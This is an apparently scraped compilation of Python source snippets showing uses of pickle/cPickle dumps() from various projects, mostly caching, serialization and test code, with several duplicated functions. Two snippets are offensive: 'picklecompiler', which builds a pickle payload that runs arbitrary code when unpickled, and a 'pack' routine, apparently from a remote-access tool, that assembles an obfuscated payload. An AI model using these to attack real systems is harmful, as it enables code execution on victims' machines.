def apply(self, callback, route):
dumps = self.json_dumps
if not self.json_dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPResponse as resp:
rv = resp
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
python类dumps()的实例源码
def memoized(func):
"""Decorator that caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned, and
the function is not re-evaluated.
Based upon from http://wiki.python.org/moin/PythonDecoratorLibrary#Memoize
Nota bene: this decorator memoizes /all/ calls to the function.
For a memoization decorator with limited cache size, consider:
http://code.activestate.com/recipes/496879-memoize-decorator-function-with-cache-size-limit/
"""
cache = {}
@wraps(func)
def func_wrapper(*args, **kwargs):
key = cPickle.dumps((args, kwargs))
if key not in cache:
cache[key] = func(*args, **kwargs)
return cache[key]
return func_wrapper
def _testStruct(self, Struct, values = {}, delattrs = ()):
schema = mapped_struct.Schema.from_typed_slots(Struct)
x = Struct()
for k in delattrs:
delattr(x, k)
for k,v in values.iteritems():
setattr(x, k, v)
px = schema.pack(x)
old_schema = schema
schema = cPickle.loads(cPickle.dumps(schema, 2))
self.assertTrue(old_schema.compatible(schema))
self.assertTrue(schema.compatible(old_schema))
dx = schema.unpack(px)
for k in Struct.__slots__:
if k in values or k not in delattrs:
self.assertEquals(getattr(dx, k, None), getattr(x, k, None))
else:
self.assertFalse(hasattr(dx, k))
def testPackPickleUnpack(self):
# hack - unregister subschema (can't register twice)
mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None)
mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None)
for TEST_VALUES in self.TEST_VALUES:
# re-register subschema
mapped_struct.mapped_object.register_schema(self.SubStruct, self.subschema, '}')
x = self.Struct(**{k:v for k,v in TEST_VALUES.iteritems()})
pschema = cPickle.dumps(self.schema)
# Unregister schema to force the need for auto-register
mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None)
mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None)
pschema = cPickle.loads(pschema)
dx = pschema.unpack(self.schema.pack(x))
for k,v in TEST_VALUES.iteritems():
self.assertTrue(hasattr(dx, k))
self.assertEqual(getattr(dx, k), v)
for k in self.Struct.__slots__:
if k not in TEST_VALUES:
self.assertFalse(hasattr(dx, k))
def news():
"""Get news from different ATOM RSS feeds."""
import feedparser
from pybossa.core import sentinel
from pybossa.news import get_news, notify_news_admins, FEED_KEY
try:
import cPickle as pickle
except ImportError: # pragma: no cover
import pickle
urls = ['https://github.com/pybossa/pybossa/releases.atom',
'http://scifabric.com/blog/all.atom.xml']
score = 0
notify = False
if current_app.config.get('NEWS_URL'):
urls += current_app.config.get('NEWS_URL')
for url in urls:
d = feedparser.parse(url)
tmp = get_news(score)
if (len(tmp) == 0) or (tmp[0]['updated'] != d.entries[0]['updated']):
sentinel.master.zadd(FEED_KEY, float(score),
pickle.dumps(d.entries[0]))
notify = True
score += 1
if notify:
notify_news_admins()
def cache(key_prefix, timeout=300):
"""
Decorator for caching functions.
Returns the function value from cache, or the function if cache disabled
"""
if timeout is None:
timeout = 300
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
key = "%s::%s" % (settings.REDIS_KEYPREFIX, key_prefix)
if os.environ.get('PYBOSSA_REDIS_CACHE_DISABLED') is None:
output = sentinel.slave.get(key)
if output:
return pickle.loads(output)
output = f(*args, **kwargs)
sentinel.master.setex(key, timeout, pickle.dumps(output))
return output
output = f(*args, **kwargs)
sentinel.master.setex(key, timeout, pickle.dumps(output))
return output
return wrapper
return decorator
def distribute_encode(socks):
writable = []
while True:
to_all, msg = yield idiokit.next()
msg_bytes = cPickle.dumps(msg, cPickle.HIGHEST_PROTOCOL)
data = struct.pack("!I", len(msg_bytes)) + msg_bytes
if to_all:
for sock in socks:
yield sock.sendall(data)
writable = []
else:
while not writable:
_, writable, _ = yield select.select((), socks, ())
writable = list(writable)
yield writable.pop().sendall(data)
def save_weights(fname, params, metadata=None):
""" assumes all params have unique names.
"""
# Includes batchnorm params now
names = [par.name for par in params]
if len(names) != len(set(names)):
raise ValueError('need unique param names')
param_dict = { param.name : param.get_value(borrow=False)
for param in params }
if metadata is not None:
param_dict['metadata'] = pickle.dumps(metadata)
logging.info('saving {} parameters to {}'.format(len(params), fname))
# try to avoid half-written files
fname = Path(fname)
if fname.exists():
tmp_fname = Path(fname.stripext() + '.tmp.npz') # TODO yes, this is a hack
np.savez_compressed(str(tmp_fname), **param_dict)
tmp_fname.rename(fname)
else:
np.savez_compressed(str(fname), **param_dict)
def testNonIdentityHash(self):
global ClassWithCustomHash
class ClassWithCustomHash(styles.Versioned):
def __init__(self, unique, hash):
self.unique = unique
self.hash = hash
def __hash__(self):
return self.hash
v1 = ClassWithCustomHash('v1', 0)
v2 = ClassWithCustomHash('v2', 0)
pkl = pickle.dumps((v1, v2))
del v1, v2
ClassWithCustomHash.persistenceVersion = 1
ClassWithCustomHash.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True)
v1, v2 = pickle.loads(pkl)
styles.doUpgrade()
self.assertEquals(v1.unique, 'v1')
self.assertEquals(v2.unique, 'v2')
self.failUnless(v1.upgraded)
self.failUnless(v2.upgraded)
def testUpgradeDeserializesObjectsRequiringUpgrade(self):
global ToyClassA, ToyClassB
class ToyClassA(styles.Versioned):
pass
class ToyClassB(styles.Versioned):
pass
x = ToyClassA()
y = ToyClassB()
pklA, pklB = pickle.dumps(x), pickle.dumps(y)
del x, y
ToyClassA.persistenceVersion = 1
def upgradeToVersion1(self):
self.y = pickle.loads(pklB)
styles.doUpgrade()
ToyClassA.upgradeToVersion1 = upgradeToVersion1
ToyClassB.persistenceVersion = 1
ToyClassB.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True)
x = pickle.loads(pklA)
styles.doUpgrade()
self.failUnless(x.y.upgraded)
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
record.exc_info = None # to avoid Unpickleable error
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
s = cPickle.dumps(d, 1)
if ei:
record.exc_info = ei # for next handler
slen = struct.pack(">L", len(s))
return slen + s
def picklecompiler(sourcefile):
"""
Usually pickle can only be used to (de)serialize objects.
This tiny snippet will allow you to transform arbitrary python source
code into a pickle string. Unpickling this string with pickle.loads()
will execute the given soruce code.
The trick is actually prettey easy: Usually eval() will only accept
expressions, thus class and function declarations does not work.
Using the work-around of code objects (returned by compile()), we can
execute real python source code :)
"""
sourcecode = file(sourcefile).read()
payload = "c__builtin__\neval\n(c__builtin__\ncompile\n(%sS'<payload>'\nS'exec'\ntRtR." % (pickle.dumps( sourcecode )[:-4],)
print payload
fp =open("poc.pickle","w")
fp.write(payload)
def _update_list(self, name, data, func):
if not self.valid(name):
return
result = None
if self._is_iterable(data):
result = [self.dumps(i) for i in data]
else:
result = [self.dumps(data)]
if not result:
return
name = str(name)
try:
func(name, *result)
except Exception as e:
[func(name, i) for i in result]
def loads(strg):
"""
Load a pickle from the current string.
The result of ``cPickle.loads(strg)`` is returned.
Parameters
----------
strg : str
The string to load.
See Also
--------
dumps : Return a string corresponding to the pickling of a masked array.
"""
return pickle.loads(strg)
def apply(self, callback, route):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization succesful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
def pack(self):
fullpayload=[]
fullpayload.append("import pupyimporter")
all_packages=[]
for sl in self.scriptlets:
all_packages.extend(sl.dependencies)
all_packages=list(set(all_packages))
for p,n in all_packages:
modules_dic=gen_package_pickled_dic(os.path.join(ROOT, p.replace("/",os.sep)), n)
fullpayload.append("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(modules_dic)))
for sl in self.scriptlets:
if self.debug:
fullpayload.append(sl.generate())
else:
#if not in debug mode, catch all exception to continue an have a session if a scriptlet raises an exception
fullpayload.append(wrap_try_except(sl.generate()))
return compress_encode_obfs('\n'.join(fullpayload))
def apply(self, callback, route):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization succesful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
def flush(self):
"""
Save storage contents to disk
This method saves new and changed :class:`Storage` contents to disk
and invalidates the Storage instance. Unchanged Storage is not saved
but simply invalidated.
"""
contents = pickle.dumps(self._storage)
if self._hash is None or md5(contents).hexdigest() != self._hash:
tmp = self._filename + '.tmp'
try:
with open(tmp, 'wb') as fo:
fo.write(contents)
except:
os.remove(tmp)
raise
move(tmp, self._filename) # Atomic save
del self._storage
def dump_stream(self, iterator, stream):
batch, best = 1, self.bestSize
iterator = iter(iterator)
while True:
vs = list(itertools.islice(iterator, batch))
if not vs:
break
bytes = self.serializer.dumps(vs)
write_int(len(bytes), stream)
stream.write(bytes)
size = len(bytes)
if size < best:
batch *= 2
elif size > best * 10 and batch > 1:
batch //= 2
def apply(self, callback, _):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
def apply(self, callback, _):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
def cache_it(self, key, f, time_expire):
if self.debug:
self.r_server.incr('web2py_cache_statistics:misses')
cache_set_key = self.cache_set_key
expire_at = int(time.time() + time_expire) + 120
bucket_key = "%s:%s" % (cache_set_key, expire_at / 60)
value = f()
value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
if time_expire == 0:
time_expire = 1
self.r_server.setex(key, time_expire, value_)
# print '%s will expire on %s: it goes in bucket %s' % (key, time.ctime(expire_at))
# print 'that will expire on %s' % (bucket_key, time.ctime(((expire_at / 60) + 1) * 60))
p = self.r_server.pipeline()
# add bucket to the fixed set
p.sadd(cache_set_key, bucket_key)
# sets the key
p.setex(key, time_expire, value_)
# add the key to the bucket
p.sadd(bucket_key, key)
# expire the bucket properly
p.expireat(bucket_key, ((expire_at / 60) + 1) * 60)
p.execute()
return value
def test_text_dataset():
with temporary_content_path(TEST_TEXT) as path:
dataset = TextDataset(path, 100)
stream = dataset.get_example_stream()
it = stream.get_epoch_iterator()
d = next(it)
assert d == (['abc', 'abc', 'def'],)
pickled_it = cPickle.dumps(it)
d = next(it)
assert d == (['def', 'def', 'xyz'],)
it = cPickle.loads(pickled_it)
d = next(it)
assert d == (['def', 'def', 'xyz'],)
d = next(it)
assert d == (['xyz'],)
def new(self, c):
"""
Insert a new creature in the DB, and set c.id accordingly
"""
assert c.id is None
# create a new row in the DB, to generate an ID
self.cur.execute("INSERT INTO creatures(id) VALUES(NULL)")
c.id = self.cur.lastrowid
born_at = self.generation
pickled = pickle.dumps(c)
# save the updated c
self.cur.execute("""
UPDATE creatures
SET born_at = ?, pickled = ?
WHERE id = ?
""", (born_at, pickled, c.id))
def save_track_proto_to_zip(track_proto, save_file):
zf = zipfile.ZipFile(save_file, 'w', allowZip64=True)
print "Writing to zip file {}...".format(save_file)
track_id = 0
for track in track_proto['tracks']:
track_obj = {}
for key in track[0]:
try:
track_obj[key] = np.asarray([box[key] for box in track])
except KeyError:
continue
zf.writestr('{:06d}.pkl'.format(track_id),
cPickle.dumps(track_obj, cPickle.HIGHEST_PROTOCOL))
track_id += 1
if (track_id + 1) % 1000 == 0:
print "\t{} tracks written.".format(track_id + 1)
print "\tTotally {} tracks written.".format(track_id + 1)
zf.close()
def apply(self, callback, route):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization succesful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
def apply(self, callback, _):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
def apply(self, callback, _):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError as error:
rv = error
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
def serialize(obj):
return pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
def cookie_encode(data, key, digestmod=None):
""" Encode and sign a pickle-able object. Return a (byte) string """
depr(0, 13, "cookie_encode() will be removed soon.",
"Do not use this API directly.")
digestmod = digestmod or hashlib.sha256
msg = base64.b64encode(pickle.dumps(data, -1))
sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=digestmod).digest())
return tob('!') + sig + tob('?') + msg